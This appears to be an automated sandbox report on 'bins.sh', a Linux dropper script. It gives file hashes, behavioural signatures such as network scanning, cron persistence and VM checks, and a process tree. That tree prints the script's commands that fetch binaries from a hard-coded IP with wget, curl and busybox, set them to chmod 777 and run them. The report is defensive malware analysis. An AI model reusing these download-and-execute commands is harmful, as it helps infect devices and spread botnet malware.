Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 13:27
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
55a1cde83448c075863af498d8f07347
-
SHA1
71fc61de9d4ab6d1ffb6f77532da9099ed462060
-
SHA256
3358bdb43f37beae54f42f364887f9c09d346e7cdb91f4d23ad252f984546bf1
-
SHA512
7637c8bf8467388ae106f959277568b0f03cf62d65e60dfcb27a678a22599224aaf25100ca898619af630f564958ccb981c22d64a1328f18c1fe389092ab6430
-
SSDEEP
192:yGgCCHWiiEpzUENiPH+NhIECCHWi5jeJPH+Nho:yGbuzFeJ
Malware Config
Signatures
-
Contacts a large (2004) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid Process 684 chmod 700 chmod 725 chmod 752 chmod -
Executes dropped EXE 4 IoCs
Processes:
i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fcv3AircBDjQCluxfKjtVOtE0Tz4MpAmti4XmN69mtAJXlP2rLzZX6kDiBJqIAtKT049fmvOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0ioc pid Process /tmp/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc 685 i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc /tmp/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X 702 v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X /tmp/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm 727 mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm /tmp/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 753 vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 -
Renames itself 1 IoCs
Processes:
vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0pid Process 754 vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.Dc07UH crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0curlcrontabdescription ioc Process File opened for reading /proc/114/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/145/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/784/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/1009/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/835/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/857/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/863/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/768/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/772/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/990/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/17/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/888/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/916/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/762/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/913/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/928/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/952/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/998/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/2/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/760/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/825/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/895/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/938/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/42/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/814/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/962/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/971/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/19/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/142/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/810/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/844/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/972/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/994/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/737/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/865/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/868/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/934/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/9/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/776/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/812/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/859/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/987/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/102/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/860/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/902/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/23/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/841/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/26/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/282/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/649/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/855/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/861/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/878/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/889/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/961/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/982/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/774/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/793/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/887/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/893/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/999/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 File opened for reading /proc/filesystems crontab File opened for reading /proc/298/cmdline vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxcurlbusyboxwgetcurlbusyboxcurlbusyboxwgetwgetdescription ioc Process File opened for modification /tmp/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X wget File opened for modification /tmp/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm curl File opened for modification /tmp/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm busybox File opened for modification /tmp/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 curl File opened for modification /tmp/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 busybox File opened for modification /tmp/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc wget File opened for modification /tmp/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc curl File opened for modification /tmp/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc busybox File opened for modification /tmp/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X curl File opened for modification /tmp/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X busybox File opened for modification /tmp/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm wget File opened for modification /tmp/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:658
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc2⤵
- Writes file to tmp directory
PID:660
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:676
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc2⤵
- Writes file to tmp directory
PID:683
-
-
/bin/chmodchmod 777 i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc./i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm i8XMtzGEao2zQ5ixPxVmz1QIxEWlxtx2fc2⤵PID:687
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X2⤵
- Writes file to tmp directory
PID:688
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X2⤵
- Writes file to tmp directory
PID:695
-
-
/bin/chmodchmod 777 v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X./v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X2⤵
- Executes dropped EXE
PID:702
-
-
/bin/rmrm v3AircBDjQCluxfKjtVOtE0Tz4MpAmti4X2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm2⤵
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm2⤵
- Writes file to tmp directory
PID:721
-
-
/bin/chmodchmod 777 mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm./mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm mN69mtAJXlP2rLzZX6kDiBJqIAtKT049fm2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb02⤵
- Writes file to tmp directory
PID:730
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb02⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb02⤵
- Writes file to tmp directory
PID:751
-
-
/bin/chmodchmod 777 vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb02⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb0./vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb02⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:753 -
/bin/shsh -c "crontab -l"3⤵PID:755
-
/usr/bin/crontabcrontab -l4⤵PID:756
-
-
-
/bin/shsh -c "crontab -"3⤵PID:757
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:758
-
-
-
-
/bin/rmrm vOA3LRkZlUP9sFGUorzVahJJalVGDTZnb02⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0fEoMGeAo5q2H6dKuyCGhue7WetRZekiEr2⤵PID:763
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD55bfc019bb6e53050fe7da9b76785a94c
SHA17223a5cfe1600b1f431d3fc146dfd3d238bc766a
SHA256e5d2222030dde8c35088cc4c318f69ba61ac2a28a2fad2975ac6f67fc94e64e0
SHA5123651009eafc9b03b79d79d6f3f16922743858ac0b5d23fed0744f5b975517fb716aeb1bdbf027c3518598efdf220077ed7c178ba18c6ea908d6854680e48a11b